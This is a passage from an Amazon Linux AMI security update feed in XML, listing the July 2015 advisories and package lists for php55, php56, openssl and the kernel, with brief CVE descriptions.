name="php54-embedded" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.42-1.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-562</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-562: medium priority package update for php55</title><issued date="2015-07-07 12:40:00" /><updated date="2015-07-07 22:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4644:
1234940:
CVE-2015-4644 php: segmentation fault in php_pgsql_meta_data()
CVE-2015-4643:
1234938:
CVE-2015-4643 php: integer overflow in ftp_genlist() resulting in heap overflow (improved fix for CVE-2015-4022)
CVE-2015-4642:
CVE-2015-3415:
The sqlite3VdbeExec function in vdbe.c in SQLite before 3.8.9 does not properly implement comparison operators, which allows context-dependent attackers to cause a denial of service (invalid free operation) or possibly have unspecified other impact via a crafted CHECK clause, as demonstrated by CHECK(0&O;&gt;O) in a CREATE TABLE statement.
1212356:
CVE-2015-3415 sqlite: invalid free() in src/vdbe.c
CVE-2015-3414:
SQLite before 3.8.9 does not properly implement the dequoting of collation-sequence names, which allows context-dependent attackers to cause a denial of service (uninitialized memory access and application crash) or possibly have unspecified other impact via a crafted COLLATE clause, as demonstrated by COLLATE"""""""" at the end of a SELECT statement.
1212353:
CVE-2015-3414 sqlite: use of uninitialized memory when parsing collation sequences in src/where.c
CVE-2015-2326:
1207202:
CVE-2015-2326 pcre: heap buffer overflow in pcre_compile2()
CVE-2015-2325:
1207198:
CVE-2015-2325 pcre: heap buffer overflow in compile_branch()
CVE-2014-3416:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3416" title="" id="CVE-2014-3416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325" title="" id="CVE-2015-2325" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326" title="" id="CVE-2015-2326" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3414" title="" id="CVE-2015-3414" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3415" title="" id="CVE-2015-3415" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4642" title="" id="CVE-2015-4642" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4643" title="" id="CVE-2015-4643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4644" title="" id="CVE-2015-4644" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-pspell" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.26-1.103.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-563</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-563: medium priority package update for php56</title><issued date="2015-07-07 12:40:00" /><updated date="2015-07-07 22:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4644:
1234940:
CVE-2015-4644 php: segmentation fault in php_pgsql_meta_data()
CVE-2015-4643:
1234938:
CVE-2015-4643 php: integer overflow in ftp_genlist() resulting in heap overflow (improved fix for CVE-2015-4022)
CVE-2015-4642:
CVE-2015-3415:
The sqlite3VdbeExec function in vdbe.c in SQLite before 3.8.9 does not properly implement comparison operators, which allows context-dependent attackers to cause a denial of service (invalid free operation) or possibly have unspecified other impact via a crafted CHECK clause, as demonstrated by CHECK(0&O;&gt;O) in a CREATE TABLE statement.
1212356:
CVE-2015-3415 sqlite: invalid free() in src/vdbe.c
CVE-2015-3414:
SQLite before 3.8.9 does not properly implement the dequoting of collation-sequence names, which allows context-dependent attackers to cause a denial of service (uninitialized memory access and application crash) or possibly have unspecified other impact via a crafted COLLATE clause, as demonstrated by COLLATE"""""""" at the end of a SELECT statement.
1212353:
CVE-2015-3414 sqlite: use of uninitialized memory when parsing collation sequences in src/where.c
CVE-2015-2326:
1207202:
CVE-2015-2326 pcre: heap buffer overflow in pcre_compile2()
CVE-2015-2325:
1207198:
CVE-2015-2325 pcre: heap buffer overflow in compile_branch()
CVE-2014-3416:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3416" title="" id="CVE-2014-3416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325" title="" id="CVE-2015-2325" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326" title="" id="CVE-2015-2326" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3414" title="" id="CVE-2015-3414" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3415" title="" id="CVE-2015-3415" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4642" title="" id="CVE-2015-4642" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4643" title="" id="CVE-2015-4643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4644" title="" id="CVE-2015-4644" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-common" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.10-1.115.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-564</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-564: critical priority package update for openssl</title><issued date="2015-07-09 06:15:00" /><updated date="2015-07-09 06:15:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1793:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1793" title="" id="CVE-2015-1793" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-devel" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-10.87.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-10.87.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-10.87.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-10.87.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-10.87.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-10.87.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-10.87.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-10.87.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-10.87.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-10.87.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-565</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-565: medium priority package update for kernel</title><issued date="2015-07-22 10:00:00" /><updated date="2015-09-25 15:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5366:
A flaw was found in the way the Linux kernel's networking implementation handled UDP packets with incorrect checksum values. A remote attacker could potentially use this flaw to trigger an infinite loop in the kernel, resulting in a denial of service on the system, or cause a denial of service in applications using the edge triggered epoll functionality.
1239029:
